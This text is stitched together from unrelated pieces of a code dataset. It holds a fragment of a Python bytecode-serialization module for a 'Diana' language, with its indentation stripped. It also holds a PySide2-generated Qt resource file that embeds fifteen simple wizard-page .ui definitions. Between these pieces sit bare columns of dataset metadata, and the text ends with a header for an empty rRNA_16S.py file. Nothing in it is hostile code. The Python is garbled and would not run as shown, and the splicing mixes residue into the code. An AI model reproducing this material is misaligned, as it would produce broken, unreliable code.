nonargcells: PVector[int]
narg: int
nlocal: int
name: InternString
filename: str
lineno: int
linenos: PVector[tuple[int, int]]
freenames: PVector[str]
localnames: PVector[str]
bytecode: Bytecode
def serialize_(self, barr: bytearray):
serialize_(self.is_vararg, barr)
serialize_(self.freeslots, barr)
serialize_(self.nonargcells, barr)
serialize_(self.narg, barr)
serialize_(self.nlocal, barr)
serialize_(self.name, barr)
serialize_(self.filename, barr)
serialize_(self.lineno, barr)
serialize_(self.linenos, barr)
serialize_(self.freenames, barr)
serialize_(self.localnames, barr)
serialize_(self.bytecode, barr)
def as_flatten(self) -> int:
return Storage.funcmetas.cache(self)
def as_flatten(self):
if isinstance(self, int):
return self
return self.as_flatten()
class Storage:
strings : Builder[str] = Builder()
internstrings : Builder[InternString] = Builder()
dobjs : Builder[DObj] = Builder()
funcmetas : Builder[FuncMeta] = Builder()
@classmethod
def serialize_(cls, barr: bytearray):
cls.strings.serialize_(barr)
cls.internstrings.serialize_(barr)
cls.dobjs.serialize_(barr)
cls.funcmetas.serialize_(barr)
class PlaceHolder:
def __init__(self, OFFSET: int):
self.OFFSET = OFFSET
Instr = (
PlaceHolder
| Diana_FunctionDef
| Diana_LoadGlobalRef
| Diana_DelVar
| Diana_LoadVar
| Diana_StoreVar
| Diana_Action
| Diana_Return
| Diana_Break
| Diana_Continue
| Diana_JumpIfNot
| Diana_JumpIfNot_OrPop
| Diana_JumpIf
| Diana_JumpIf_OrPop
| Diana_Jump
| Diana_GetAttr
| Diana_SetAttr
| Diana_SetAttr_Iadd
| Diana_SetAttr_Isub
| Diana_SetAttr_Imul
| Diana_SetAttr_Itruediv
| Diana_SetAttr_Ifloordiv
| Diana_SetAttr_Imod
| Diana_SetAttr_Ipow
| Diana_SetAttr_Ilshift
| Diana_SetAttr_Irshift
| Diana_SetAttr_Ibitor
| Diana_SetAttr_Ibitand
| Diana_SetAttr_Ibitxor
| Diana_DelItem
| Diana_GetItem
| Diana_SetItem
| Diana_SetItem_Iadd
| Diana_SetItem_Isub
| Diana_SetItem_Imul
| Diana_SetItem_Itruediv
| Diana_SetItem_Ifloordiv
| Diana_SetItem_Imod
| Diana_SetItem_Ipow
| Diana_SetItem_Ilshift
| Diana_SetItem_Irshift
| Diana_SetItem_Ibitor
| Diana_SetItem_Ibitand
| Diana_SetItem_Ibitxor
| Diana_add
| Diana_sub
| Diana_mul
| Diana_truediv
| Diana_floordiv
| Diana_mod
| Diana_pow
| Diana_lshift
| Diana_rshift
| Diana_bitor
| Diana_bitand
| Diana_bitxor
| Diana_gt
| Diana_lt
| Diana_ge
| Diana_le
| Diana_eq
| Diana_ne
| Diana_in
| Diana_notin
| Diana_UnaryOp_invert
| Diana_UnaryOp_not
| Diana_UnaryOp_neg
| Diana_MKDict
| Diana_MKSet
| Diana_MKList
| Diana_Call
| Diana_Format
| Diana_Const
| Diana_MKTuple
| Diana_Pack
| Diana_Replicate
| Diana_Pop
| Diana_TryCatch
| Diana_TryFinally
| Diana_TryCatchFinally
| Diana_Loop
| Diana_For
| Diana_With
)
TypeIndex = [
Diana_FunctionDef,
Diana_LoadGlobalRef,
Diana_DelVar,
Diana_LoadVar,
Diana_StoreVar,
Diana_Action,
Diana_Return,
Diana_Break,
Diana_Continue,
Diana_JumpIfNot,
Diana_JumpIfNot_OrPop,
Diana_JumpIf,
Diana_JumpIf_OrPop,
Diana_Jump,
Diana_GetAttr,
Diana_SetAttr,
Diana_SetAttr_Iadd,
Diana_SetAttr_Isub,
Diana_SetAttr_Imul,
Diana_SetAttr_Itruediv,
Diana_SetAttr_Ifloordiv,
Diana_SetAttr_Imod,
Diana_SetAttr_Ipow,
Diana_SetAttr_Ilshift,
Diana_SetAttr_Irshift,
Diana_SetAttr_Ibitor,
Diana_SetAttr_Ibitand,
Diana_SetAttr_Ibitxor,
Diana_DelItem,
Diana_GetItem,
Diana_SetItem,
Diana_SetItem_Iadd,
Diana_SetItem_Isub,
Diana_SetItem_Imul,
Diana_SetItem_Itruediv,
Diana_SetItem_Ifloordiv,
Diana_SetItem_Imod,
Diana_SetItem_Ipow,
Diana_SetItem_Ilshift,
Diana_SetItem_Irshift,
Diana_SetItem_Ibitor,
Diana_SetItem_Ibitand,
Diana_SetItem_Ibitxor,
Diana_add,
Diana_sub,
Diana_mul,
Diana_truediv,
Diana_floordiv,
Diana_mod,
Diana_pow,
Diana_lshift,
Diana_rshift,
Diana_bitor,
Diana_bitand,
Diana_bitxor,
Diana_gt,
Diana_lt,
Diana_ge,
Diana_le,
Diana_eq,
Diana_ne,
Diana_in,
Diana_notin,
Diana_UnaryOp_invert,
Diana_UnaryOp_not,
Diana_UnaryOp_neg,
Diana_MKDict,
Diana_MKSet,
Diana_MKList,
Diana_Call,
Diana_Format,
Diana_Const,
Diana_MKTuple,
Diana_Pack,
Diana_Replicate,
Diana_Pop,
Diana_TryCatch,
Diana_TryFinally,
Diana_TryCatchFinally,
Diana_Loop,
Diana_For,
Diana_With,
]
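# Illustration (not part of the original module): every instruction serializes
# itself by appending its TAG followed by its operands, so a sequence of
# instructions flattens into a list of ints/InternStrings, and TypeIndex plus
# each class's OFFSET is enough to walk that list again.
#
#   flat = []                      # a BytecodeBuilder
#   Diana_LoadVar(0).dumps(flat)   # flat == [3, 0]
#   Diana_Const(1).dumps(flat)     # flat == [3, 0, 71, 1]
#   Diana_add().dumps(flat)        # flat == [3, 0, 71, 1, 43]
#   assert TypeIndex[flat[0]] is Diana_LoadVar and Diana_LoadVar.OFFSET == 2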
| 23.06338
| 74
| 0.626041
| 2,721
| 22,925
| 5.049614
| 0.0871
| 0.124017
| 0.133479
| 0.171616
| 0.813028
| 0.796143
| 0.792722
| 0.792722
| 0.792722
| 0.782096
| 0
| 0.014518
| 0.290905
| 22,925
| 994
| 75
| 23.06338
| 0.830709
| 0
| 0
| 0.501225
| 0
| 0
| 0.000091
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.106618
| false
| 0
| 0.007353
| 0.001225
| 0.502451
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
6128eccd39b2beb0700ee36e7f13d745e86b95fa
| 16,354
|
py
|
Python
|
questions/57185927/57185927-2/resource_rc.py
|
LoicGRENON/stackoverflow
|
e555b9dbb479ba2f36cd51dea373e1cfafffa6b1
|
[
"MIT"
] | 302
|
2017-03-04T00:05:23.000Z
|
2022-03-28T22:51:29.000Z
|
questions/57185927/57185927-2/resource_rc.py
|
JohnDavidAnthony/stackoverflow
|
9fb130501cd546b524024c98b6bc8e8a2d8df035
|
[
"MIT"
] | 30
|
2017-12-02T19:26:43.000Z
|
2022-03-28T07:40:36.000Z
|
questions/57185927/57185927-2/resource_rc.py
|
JohnDavidAnthony/stackoverflow
|
9fb130501cd546b524024c98b6bc8e8a2d8df035
|
[
"MIT"
] | 388
|
2017-07-04T16:53:12.000Z
|
2022-03-18T22:20:19.000Z
|
# -*- coding: utf-8 -*-
# Resource object code
#
# Created: Wed Jul 24 11:39:18 2019
# by: The Resource Compiler for PySide2 (Qt v5.13.0)
#
# WARNING! All changes made in this file will be lost!
from PySide2 import QtCore
qt_resource_data = b"\
\x00\x00\x02i\
<\
?xml version=\x221.\
0\x22 encoding=\x22UTF\
-8\x22?>\x0a<ui versio\
n=\x224.0\x22>\x0a <class\
>WizardPage</cla\
ss>\x0a <widget cla\
ss=\x22QWizardPage\x22\
name=\x22WizardPag\
e\x22>\x0a <property \
name=\x22geometry\x22>\
\x0a <rect>\x0a <\
x>0</x>\x0a <y>0\
</y>\x0a <width>\
400</width>\x0a \
<height>300</hei\
ght>\x0a </rect>\x0a\
</property>\x0a \
<property name=\x22\
windowTitle\x22>\x0a \
<string>WizardP\
age</string>\x0a <\
/property>\x0a <la\
yout class=\x22QVBo\
xLayout\x22 name=\x22v\
erticalLayout\x22>\x0a\
<item>\x0a <w\
idget class=\x22QPu\
shButton\x22 name=\x22\
pushButton\x22>\x0a \
<property name\
=\x22text\x22>\x0a <\
string>15</strin\
g>\x0a </proper\
ty>\x0a </widget\
>\x0a </item>\x0a <\
/layout>\x0a </widg\
et>\x0a <resources/\
>\x0a <connections/\
>\x0a</ui>\x0a\
\x00\x00\x02i\
<\
?xml version=\x221.\
0\x22 encoding=\x22UTF\
-8\x22?>\x0a<ui versio\
n=\x224.0\x22>\x0a <class\
>WizardPage</cla\
ss>\x0a <widget cla\
ss=\x22QWizardPage\x22\
name=\x22WizardPag\
e\x22>\x0a <property \
name=\x22geometry\x22>\
\x0a <rect>\x0a <\
x>0</x>\x0a <y>0\
</y>\x0a <width>\
400</width>\x0a \
<height>300</hei\
ght>\x0a </rect>\x0a\
</property>\x0a \
<property name=\x22\
windowTitle\x22>\x0a \
<string>WizardP\
age</string>\x0a <\
/property>\x0a <la\
yout class=\x22QVBo\
xLayout\x22 name=\x22v\
erticalLayout\x22>\x0a\
<item>\x0a <w\
idget class=\x22QPu\
shButton\x22 name=\x22\
pushButton\x22>\x0a \
<property name\
=\x22text\x22>\x0a <\
string>13</strin\
g>\x0a </proper\
ty>\x0a </widget\
>\x0a </item>\x0a <\
/layout>\x0a </widg\
et>\x0a <resources/\
>\x0a <connections/\
>\x0a</ui>\x0a\
\x00\x00\x02i\
<\
?xml version=\x221.\
0\x22 encoding=\x22UTF\
-8\x22?>\x0a<ui versio\
n=\x224.0\x22>\x0a <class\
>WizardPage</cla\
ss>\x0a <widget cla\
ss=\x22QWizardPage\x22\
name=\x22WizardPag\
e\x22>\x0a <property \
name=\x22geometry\x22>\
\x0a <rect>\x0a <\
x>0</x>\x0a <y>0\
</y>\x0a <width>\
400</width>\x0a \
<height>300</hei\
ght>\x0a </rect>\x0a\
</property>\x0a \
<property name=\x22\
windowTitle\x22>\x0a \
<string>WizardP\
age</string>\x0a <\
/property>\x0a <la\
yout class=\x22QVBo\
xLayout\x22 name=\x22v\
erticalLayout\x22>\x0a\
<item>\x0a <w\
idget class=\x22QPu\
shButton\x22 name=\x22\
pushButton\x22>\x0a \
<property name\
=\x22text\x22>\x0a <\
string>11</strin\
g>\x0a </proper\
ty>\x0a </widget\
>\x0a </item>\x0a <\
/layout>\x0a </widg\
et>\x0a <resources/\
>\x0a <connections/\
>\x0a</ui>\x0a\
\x00\x00\x02h\
<\
?xml version=\x221.\
0\x22 encoding=\x22UTF\
-8\x22?>\x0a<ui versio\
n=\x224.0\x22>\x0a <class\
>WizardPage</cla\
ss>\x0a <widget cla\
ss=\x22QWizardPage\x22\
name=\x22WizardPag\
e\x22>\x0a <property \
name=\x22geometry\x22>\
\x0a <rect>\x0a <\
x>0</x>\x0a <y>0\
</y>\x0a <width>\
400</width>\x0a \
<height>300</hei\
ght>\x0a </rect>\x0a\
</property>\x0a \
<property name=\x22\
windowTitle\x22>\x0a \
<string>WizardP\
age</string>\x0a <\
/property>\x0a <la\
yout class=\x22QVBo\
xLayout\x22 name=\x22v\
erticalLayout\x22>\x0a\
<item>\x0a <w\
idget class=\x22QPu\
shButton\x22 name=\x22\
pushButton\x22>\x0a \
<property name\
=\x22text\x22>\x0a <\
string>5</string\
>\x0a </propert\
y>\x0a </widget>\
\x0a </item>\x0a </\
layout>\x0a </widge\
t>\x0a <resources/>\
\x0a <connections/>\
\x0a</ui>\x0a\
\x00\x00\x02h\
<\
?xml version=\x221.\
0\x22 encoding=\x22UTF\
-8\x22?>\x0a<ui versio\
n=\x224.0\x22>\x0a <class\
>WizardPage</cla\
ss>\x0a <widget cla\
ss=\x22QWizardPage\x22\
name=\x22WizardPag\
e\x22>\x0a <property \
name=\x22geometry\x22>\
\x0a <rect>\x0a <\
x>0</x>\x0a <y>0\
</y>\x0a <width>\
400</width>\x0a \
<height>300</hei\
ght>\x0a </rect>\x0a\
</property>\x0a \
<property name=\x22\
windowTitle\x22>\x0a \
<string>WizardP\
age</string>\x0a <\
/property>\x0a <la\
yout class=\x22QVBo\
xLayout\x22 name=\x22v\
erticalLayout\x22>\x0a\
<item>\x0a <w\
idget class=\x22QPu\
shButton\x22 name=\x22\
pushButton\x22>\x0a \
<property name\
=\x22text\x22>\x0a <\
string>2</string\
>\x0a </propert\
y>\x0a </widget>\
\x0a </item>\x0a </\
layout>\x0a </widge\
t>\x0a <resources/>\
\x0a <connections/>\
\x0a</ui>\x0a\
\x00\x00\x02i\
<\
?xml version=\x221.\
0\x22 encoding=\x22UTF\
-8\x22?>\x0a<ui versio\
n=\x224.0\x22>\x0a <class\
>WizardPage</cla\
ss>\x0a <widget cla\
ss=\x22QWizardPage\x22\
name=\x22WizardPag\
e\x22>\x0a <property \
name=\x22geometry\x22>\
\x0a <rect>\x0a <\
x>0</x>\x0a <y>0\
</y>\x0a <width>\
400</width>\x0a \
<height>300</hei\
ght>\x0a </rect>\x0a\
</property>\x0a \
<property name=\x22\
windowTitle\x22>\x0a \
<string>WizardP\
age</string>\x0a <\
/property>\x0a <la\
yout class=\x22QVBo\
xLayout\x22 name=\x22v\
erticalLayout\x22>\x0a\
<item>\x0a <w\
idget class=\x22QPu\
shButton\x22 name=\x22\
pushButton\x22>\x0a \
<property name\
=\x22text\x22>\x0a <\
string>10</strin\
g>\x0a </proper\
ty>\x0a </widget\
>\x0a </item>\x0a <\
/layout>\x0a </widg\
et>\x0a <resources/\
>\x0a <connections/\
>\x0a</ui>\x0a\
\x00\x00\x02h\
<\
?xml version=\x221.\
0\x22 encoding=\x22UTF\
-8\x22?>\x0a<ui versio\
n=\x224.0\x22>\x0a <class\
>WizardPage</cla\
ss>\x0a <widget cla\
ss=\x22QWizardPage\x22\
name=\x22WizardPag\
e\x22>\x0a <property \
name=\x22geometry\x22>\
\x0a <rect>\x0a <\
x>0</x>\x0a <y>0\
</y>\x0a <width>\
400</width>\x0a \
<height>300</hei\
ght>\x0a </rect>\x0a\
</property>\x0a \
<property name=\x22\
windowTitle\x22>\x0a \
<string>WizardP\
age</string>\x0a <\
/property>\x0a <la\
yout class=\x22QVBo\
xLayout\x22 name=\x22v\
erticalLayout\x22>\x0a\
<item>\x0a <w\
idget class=\x22QPu\
shButton\x22 name=\x22\
pushButton\x22>\x0a \
<property name\
=\x22text\x22>\x0a <\
string>3</string\
>\x0a </propert\
y>\x0a </widget>\
\x0a </item>\x0a </\
layout>\x0a </widge\
t>\x0a <resources/>\
\x0a <connections/>\
\x0a</ui>\x0a\
\x00\x00\x02h\
<\
?xml version=\x221.\
0\x22 encoding=\x22UTF\
-8\x22?>\x0a<ui versio\
n=\x224.0\x22>\x0a <class\
>WizardPage</cla\
ss>\x0a <widget cla\
ss=\x22QWizardPage\x22\
name=\x22WizardPag\
e\x22>\x0a <property \
name=\x22geometry\x22>\
\x0a <rect>\x0a <\
x>0</x>\x0a <y>0\
</y>\x0a <width>\
400</width>\x0a \
<height>300</hei\
ght>\x0a </rect>\x0a\
</property>\x0a \
<property name=\x22\
windowTitle\x22>\x0a \
<string>WizardP\
age</string>\x0a <\
/property>\x0a <la\
yout class=\x22QVBo\
xLayout\x22 name=\x22v\
erticalLayout\x22>\x0a\
<item>\x0a <w\
idget class=\x22QPu\
shButton\x22 name=\x22\
pushButton\x22>\x0a \
<property name\
=\x22text\x22>\x0a <\
string>9</string\
>\x0a </propert\
y>\x0a </widget>\
\x0a </item>\x0a </\
layout>\x0a </widge\
t>\x0a <resources/>\
\x0a <connections/>\
\x0a</ui>\x0a\
\x00\x00\x02i\
<\
?xml version=\x221.\
0\x22 encoding=\x22UTF\
-8\x22?>\x0a<ui versio\
n=\x224.0\x22>\x0a <class\
>WizardPage</cla\
ss>\x0a <widget cla\
ss=\x22QWizardPage\x22\
name=\x22WizardPag\
e\x22>\x0a <property \
name=\x22geometry\x22>\
\x0a <rect>\x0a <\
x>0</x>\x0a <y>0\
</y>\x0a <width>\
400</width>\x0a \
<height>300</hei\
ght>\x0a </rect>\x0a\
</property>\x0a \
<property name=\x22\
windowTitle\x22>\x0a \
<string>WizardP\
age</string>\x0a <\
/property>\x0a <la\
yout class=\x22QVBo\
xLayout\x22 name=\x22v\
erticalLayout\x22>\x0a\
<item>\x0a <w\
idget class=\x22QPu\
shButton\x22 name=\x22\
pushButton\x22>\x0a \
<property name\
=\x22text\x22>\x0a <\
string>14</strin\
g>\x0a </proper\
ty>\x0a </widget\
>\x0a </item>\x0a <\
/layout>\x0a </widg\
et>\x0a <resources/\
>\x0a <connections/\
>\x0a</ui>\x0a\
\x00\x00\x02i\
<\
?xml version=\x221.\
0\x22 encoding=\x22UTF\
-8\x22?>\x0a<ui versio\
n=\x224.0\x22>\x0a <class\
>WizardPage</cla\
ss>\x0a <widget cla\
ss=\x22QWizardPage\x22\
name=\x22WizardPag\
e\x22>\x0a <property \
name=\x22geometry\x22>\
\x0a <rect>\x0a <\
x>0</x>\x0a <y>0\
</y>\x0a <width>\
400</width>\x0a \
<height>300</hei\
ght>\x0a </rect>\x0a\
</property>\x0a \
<property name=\x22\
windowTitle\x22>\x0a \
<string>WizardP\
age</string>\x0a <\
/property>\x0a <la\
yout class=\x22QVBo\
xLayout\x22 name=\x22v\
erticalLayout\x22>\x0a\
<item>\x0a <w\
idget class=\x22QPu\
shButton\x22 name=\x22\
pushButton\x22>\x0a \
<property name\
=\x22text\x22>\x0a <\
string>12</strin\
g>\x0a </proper\
ty>\x0a </widget\
>\x0a </item>\x0a <\
/layout>\x0a </widg\
et>\x0a <resources/\
>\x0a <connections/\
>\x0a</ui>\x0a\
\x00\x00\x02h\
<\
?xml version=\x221.\
0\x22 encoding=\x22UTF\
-8\x22?>\x0a<ui versio\
n=\x224.0\x22>\x0a <class\
>WizardPage</cla\
ss>\x0a <widget cla\
ss=\x22QWizardPage\x22\
name=\x22WizardPag\
e\x22>\x0a <property \
name=\x22geometry\x22>\
\x0a <rect>\x0a <\
x>0</x>\x0a <y>0\
</y>\x0a <width>\
400</width>\x0a \
<height>300</hei\
ght>\x0a </rect>\x0a\
</property>\x0a \
<property name=\x22\
windowTitle\x22>\x0a \
<string>WizardP\
age</string>\x0a <\
/property>\x0a <la\
yout class=\x22QVBo\
xLayout\x22 name=\x22v\
erticalLayout\x22>\x0a\
<item>\x0a <w\
idget class=\x22QPu\
shButton\x22 name=\x22\
pushButton\x22>\x0a \
<property name\
=\x22text\x22>\x0a <\
string>6</string\
>\x0a </propert\
y>\x0a </widget>\
\x0a </item>\x0a </\
layout>\x0a </widge\
t>\x0a <resources/>\
\x0a <connections/>\
\x0a</ui>\x0a\
\x00\x00\x02h\
<\
?xml version=\x221.\
0\x22 encoding=\x22UTF\
-8\x22?>\x0a<ui versio\
n=\x224.0\x22>\x0a <class\
>WizardPage</cla\
ss>\x0a <widget cla\
ss=\x22QWizardPage\x22\
name=\x22WizardPag\
e\x22>\x0a <property \
name=\x22geometry\x22>\
\x0a <rect>\x0a <\
x>0</x>\x0a <y>0\
</y>\x0a <width>\
400</width>\x0a \
<height>300</hei\
ght>\x0a </rect>\x0a\
</property>\x0a \
<property name=\x22\
windowTitle\x22>\x0a \
<string>WizardP\
age</string>\x0a <\
/property>\x0a <la\
yout class=\x22QVBo\
xLayout\x22 name=\x22v\
erticalLayout\x22>\x0a\
<item>\x0a <w\
idget class=\x22QPu\
shButton\x22 name=\x22\
pushButton\x22>\x0a \
<property name\
=\x22text\x22>\x0a <\
string>7</string\
>\x0a </propert\
y>\x0a </widget>\
\x0a </item>\x0a </\
layout>\x0a </widge\
t>\x0a <resources/>\
\x0a <connections/>\
\x0a</ui>\x0a\
\x00\x00\x02h\
<\
?xml version=\x221.\
0\x22 encoding=\x22UTF\
-8\x22?>\x0a<ui versio\
n=\x224.0\x22>\x0a <class\
>WizardPage</cla\
ss>\x0a <widget cla\
ss=\x22QWizardPage\x22\
name=\x22WizardPag\
e\x22>\x0a <property \
name=\x22geometry\x22>\
\x0a <rect>\x0a <\
x>0</x>\x0a <y>0\
</y>\x0a <width>\
400</width>\x0a \
<height>300</hei\
ght>\x0a </rect>\x0a\
</property>\x0a \
<property name=\x22\
windowTitle\x22>\x0a \
<string>WizardP\
age</string>\x0a <\
/property>\x0a <la\
yout class=\x22QVBo\
xLayout\x22 name=\x22v\
erticalLayout\x22>\x0a\
<item>\x0a <w\
idget class=\x22QPu\
shButton\x22 name=\x22\
pushButton\x22>\x0a \
<property name\
=\x22text\x22>\x0a <\
string>8</string\
>\x0a </propert\
y>\x0a </widget>\
\x0a </item>\x0a </\
layout>\x0a </widge\
t>\x0a <resources/>\
\x0a <connections/>\
\x0a</ui>\x0a\
\x00\x00\x02h\
<\
?xml version=\x221.\
0\x22 encoding=\x22UTF\
-8\x22?>\x0a<ui versio\
n=\x224.0\x22>\x0a <class\
>WizardPage</cla\
ss>\x0a <widget cla\
ss=\x22QWizardPage\x22\
name=\x22WizardPag\
e\x22>\x0a <property \
name=\x22geometry\x22>\
\x0a <rect>\x0a <\
x>0</x>\x0a <y>0\
</y>\x0a <width>\
400</width>\x0a \
<height>300</hei\
ght>\x0a </rect>\x0a\
</property>\x0a \
<property name=\x22\
windowTitle\x22>\x0a \
<string>WizardP\
age</string>\x0a <\
/property>\x0a <la\
yout class=\x22QVBo\
xLayout\x22 name=\x22v\
erticalLayout\x22>\x0a\
<item>\x0a <w\
idget class=\x22QPu\
shButton\x22 name=\x22\
pushButton\x22>\x0a \
<property name\
=\x22text\x22>\x0a <\
string>4</string\
>\x0a </propert\
y>\x0a </widget>\
\x0a </item>\x0a </\
layout>\x0a </widge\
t>\x0a <resources/>\
\x0a <connections/>\
\x0a</ui>\x0a\
\x00\x00\x02h\
<\
?xml version=\x221.\
0\x22 encoding=\x22UTF\
-8\x22?>\x0a<ui versio\
n=\x224.0\x22>\x0a <class\
>WizardPage</cla\
ss>\x0a <widget cla\
ss=\x22QWizardPage\x22\
name=\x22WizardPag\
e\x22>\x0a <property \
name=\x22geometry\x22>\
\x0a <rect>\x0a <\
x>0</x>\x0a <y>0\
</y>\x0a <width>\
400</width>\x0a \
<height>300</hei\
ght>\x0a </rect>\x0a\
</property>\x0a \
<property name=\x22\
windowTitle\x22>\x0a \
<string>WizardP\
age</string>\x0a <\
/property>\x0a <la\
yout class=\x22QVBo\
xLayout\x22 name=\x22v\
erticalLayout\x22>\x0a\
<item>\x0a <w\
idget class=\x22QPu\
shButton\x22 name=\x22\
pushButton\x22>\x0a \
<property name\
=\x22text\x22>\x0a <\
string>1</string\
>\x0a </propert\
y>\x0a </widget>\
\x0a </item>\x0a </\
layout>\x0a </widge\
t>\x0a <resources/>\
\x0a <connections/>\
\x0a</ui>\x0a\
"
qt_resource_name = b"\
\x00\x08\
\x01\x08\x86Y\
\x00w\
\x00i\x00z\x00a\x00r\x00d\x00U\x00I\
\x00\x0f\
\x00\xca\x009\
\x001\
\x005\x00.\x00c\x00o\x00c\x00l\x00u\x00s\x00i\x00o\x00n\x00.\x00u\x00i\
\x00\x0e\
\x06k\xb0\x19\
\x001\
\x003\x00.\x00p\x00r\x00i\x00n\x00t\x00i\x00n\x00g\x00.\x00u\x00i\
\x00\x12\
\x06i\xc3\x19\
\x001\
\x001\x00.\x00t\x00o\x00o\x00l\x00B\x00o\x00x\x00S\x00h\x00r\x00C\x00t\x00.\x00u\
\x00i\
\x00\x0f\
\x04\x80qy\
\x005\
\x00.\x00c\x00o\x00d\x00e\x00D\x00i\x00a\x00l\x00o\x00g\x00.\x00u\x00i\
\x00\x12\
\x09H\xb6\x99\
\x002\
\x00.\x00g\x00r\x00a\x00p\x00h\x00i\x00c\x00s\x00S\x00c\x00e\x00n\x00e\x00.\x00u\
\x00i\
\x00\x11\
\x05$\xde\xf9\
\x001\
\x000\x00.\x00t\x00o\x00o\x00l\x00B\x00o\x00x\x00B\x00t\x00n\x00s\x00.\x00u\x00i\
\
\x00\x16\
\x09\xfbe\x19\
\x003\
\x00.\x00g\x00r\x00a\x00p\x00h\x00i\x00c\x00s\x00S\x00c\x00e\x00n\x00e\x00T\x00e\
\x00x\x00t\x00.\x00u\x00i\
\x00\x0c\
\x05\x1d\xd9y\
\x009\
\x00.\x00t\x00o\x00o\x00l\x00b\x00o\x00x\x00.\x00u\x00i\
\x00\x0e\
\x02\xfd\xff\xf9\
\x001\
\x004\x00.\x00s\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00.\x00u\x00i\
\x00\x11\
\x0f\x8as9\
\x001\
\x002\x00.\x00p\x00r\x00o\x00p\x00e\x00r\x00t\x00y\x00B\x00o\x00x\x00.\x00u\x00i\
\
\x00\x15\
\x06\xa5\xfc\xb9\
\x006\
\x00.\x00g\x00r\x00a\x00p\x00h\x00i\x00c\x00s\x00S\x00c\x00e\x00n\x00e\x00B\x00o\
\x00x\x00.\x00u\x00i\
\x00\x18\
\x09(\x9d\xd9\
\x007\
\x00.\x00g\x00r\x00a\x00p\x00h\x00i\x00c\x00s\x00S\x00c\x00e\x00n\x00e\x00P\x00i\
\x00x\x00m\x00a\x00p\x00.\x00u\x00i\
\x00\x17\
\x0c3~\xf9\
\x008\
\x00.\x00g\x00r\x00a\x00p\x00h\x00i\x00c\x00s\x00S\x00c\x00e\x00n\x00e\x00S\x00h\
\x00r\x00C\x00t\x00.\x00u\x00i\
\x00\x0f\
\x05\xaam9\
\x004\
\x00.\x00t\x00e\x00x\x00t\x00D\x00i\x00a\x00l\x00o\x00g\x00.\x00u\x00i\
\x00\x10\
\x0e\x1c\xd5\x99\
\x001\
\x00.\x00w\x00e\x00l\x00c\x00o\x00m\x00e\x00P\x00a\x00g\x00e\x00.\x00u\x00i\
"
qt_resource_struct = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x0f\x00\x00\x00\x02\
\x00\x00\x00\x16\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
\x00\x00\x01L\x00\x00\x00\x00\x00\x01\x00\x00\x13d\
\x00\x00\x00\x86\x00\x00\x00\x00\x00\x01\x00\x00\x07G\
\x00\x00\x01.\x00\x00\x00\x00\x00\x01\x00\x00\x10\xf8\
\x00\x00\x00\xd4\x00\x00\x00\x00\x00\x01\x00\x00\x0c\x1f\
\x00\x00\x020\x00\x00\x00\x00\x00\x01\x00\x00\x1f\x82\
\x00\x00\x00\x5c\x00\x00\x00\x00\x00\x01\x00\x00\x04\xda\
\x00\x00\x00:\x00\x00\x00\x00\x00\x01\x00\x00\x02m\
\x00\x00\x01\x96\x00\x00\x00\x00\x00\x01\x00\x00\x18>\
\x00\x00\x01\xc6\x00\x00\x00\x00\x00\x01\x00\x00\x1a\xaa\
\x00\x00\x00\xaa\x00\x00\x00\x00\x00\x01\x00\x00\x09\xb3\
\x00\x00\x00\xfc\x00\x00\x00\x00\x00\x01\x00\x00\x0e\x8c\
\x00\x00\x01\xfc\x00\x00\x00\x00\x00\x01\x00\x00\x1d\x16\
\x00\x00\x02T\x00\x00\x00\x00\x00\x01\x00\x00!\xee\
\x00\x00\x01n\x00\x00\x00\x00\x00\x01\x00\x00\x15\xd1\
"
def qInitResources():
QtCore.qRegisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)
def qCleanupResources():
QtCore.qUnregisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)
qInitResources()
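# Importing this module calls qInitResources(), which registers the embedded
# .ui definitions with Qt's resource system; assuming the "wizardUI" prefix
# encoded in qt_resource_name above, they can then be opened through resource
# paths such as QtCore.QFile(":/wizardUI/1.welcomePage.ui").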
| 22.34153
| 96
| 0.643818
| 2,565
| 16,354
| 4.097856
| 0.08499
| 0.07535
| 0.058225
| 0.045666
| 0.892779
| 0.883836
| 0.881267
| 0.871849
| 0.834174
| 0.820188
| 0
| 0.180604
| 0.125474
| 16,354
| 731
| 97
| 22.372093
| 0.554328
| 0.011312
| 0
| 0.863128
| 0
| 0.044693
| 0
| 0
| 0
| 0
| 0.000495
| 0
| 0
| 1
| 0.002793
| false
| 0
| 0.001397
| 0
| 0.00419
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b690a721a794eb402550800beb7ea64672b5a775
| 3,222
|
py
|
Python
|
rRNA_16S.py
|
everyday847/vienna_guided_mc
|
549ea00a8bf56e7b9556b177cb689f363de90780
|
[
"MIT"
] | null | null | null |
rRNA_16S.py
|
everyday847/vienna_guided_mc
|
549ea00a8bf56e7b9556b177cb689f363de90780
|
[
"MIT"
] | null | null | null |
rRNA_16S.py
|
everyday847/vienna_guided_mc
|
549ea00a8bf56e7b9556b177cb689f363de90780
|
[
"MIT"
] | null | null | null |
